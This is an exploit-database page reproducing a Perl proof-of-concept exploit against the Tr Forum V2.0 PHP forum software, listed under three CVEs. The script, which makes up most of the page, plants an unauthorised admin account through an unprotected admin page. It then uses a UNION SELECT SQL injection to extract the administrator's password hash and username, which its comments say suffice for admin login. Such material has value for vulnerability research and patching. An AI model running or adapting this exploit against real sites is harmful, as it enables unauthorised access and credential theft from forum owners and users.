Tr Forum V2.0 Multiple Vulnerabilities

2006.09.08
Credit: DarkFig
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2006-4586 | CVE-2006-4585 | CVE-2006-4584
CWE: N/A

#!/usr/bin/perl # # Affected.scr..: Tr Forum V2.0 # Poc.ID........: 10060903 # Type..........: SQL Injection, Bypass Security Restriction # Risk.level....: Medium # Vendor.Status.: Unpatched # Src.download..: comscripts.com/scripts/php.tr-forum.1579.html # Poc.link......: acid-root.new.fr/poc/10060903.txt # Credits.......: DarkFig # # /membres/modif_profil.php => Profil modification (you can choose the id of the member) # /membres/change_mdp.php => Password modification ( same... ) # /admin/insert_admin.php => Second admin (only del post) # /admin/editer.php => SQL Injection without quote # # You don't need to crack passwd hashes (for the admin panel)... # Go to the admin panel (/admin/), enter the username and the hash (not the passwd)... bad security =( # This exploit is FOR EDUCATIONAL PURPOSE ONLY x 999 # use LWP::UserAgent; use HTTP::Cookies; use HTTP::Request::Common "POST"; use HTTP::Response; use Getopt::Long; use strict; print STDOUT "n+", '-' x 53, "+n"; print STDOUT "| Tr Forum V2.0 Admin MD5 Passwd Hash Disclosure |n"; print STDOUT '+', '-' x 53, "+n"; my($host,$path,$proxh,$proxu,$proxp); my $opt = GetOptions( 'host=s' => $host, 'path=s' => $path, 'proxh=s' => $proxh, 'proxu=s' => $proxu, 'proxp=s' => $proxp); if(!$host) { print STDOUT "| Usage: ./xx.pl --host=[www] --path=[/] [Options] |n"; print STDOUT "| [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd] |n"; print STDOUT '+', '-' x 53, "+n"; exit(0); } if($host !~ /http/) {$host = 'http://'.$host;} if($proxh !~ /http/ && $proxh != '') {$proxh = 'http://'.$proxh.'/';} if(!$path) {$path = '/';} print STDOUT " [!]Host..: $hostn"; print STDOUT " [!]Path..: $pathn"; print STDOUT " [~]Admin user...n"; sleep(1); my $cc = HTTP::Cookies->new(); my $ua = LWP::UserAgent->new(); $ua->cookie_jar($cc); $ua->agent('0xzilla'); $ua->timeout(30); $ua->proxy(['http'] => $proxh) if $proxh; my $re = POST $host.$path.'/admin/insert_admin.php',[ 'login' => 'AcidSploitWasHere', 'password' => 'psychopasswd', 'mail' => 'nospam (at) bot (dot) com [email concealed]', ]; $re->proxy_authorization_basic($proxu, $proxp) if $proxp; $ua->request($re); print STDOUT " [+]User..: AcidSploitWasHeren"; print STDOUT " [+]Pass..: psychopasswdn"; print STDOUT " [!]Rights: 2 (medium)n"; print STDOUT " [~]Collecting admin's hash/username...n"; sleep(1); my $re = POST $host.$path.'index.php',[ 'login' => 'AcidSploitWasHere', 'pwd' => 'psychopasswd', ]; $ua->request($re); my $re = $ua->get($host.$path.'admin/editer.php?id2=-1 UNION SELECT pass,pseudo,0 FROM tr_user_forum'); if($re->content =~ /">([a-z0-9]{32})</font>/) { print STDOUT "n ".$1.'::';} if($re->content =~ /;">(.*?)</textarea>/) { print STDOUT $1.' (root)';} print STDOUT "n+", '-' x 53, "+n"; exit(0);


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top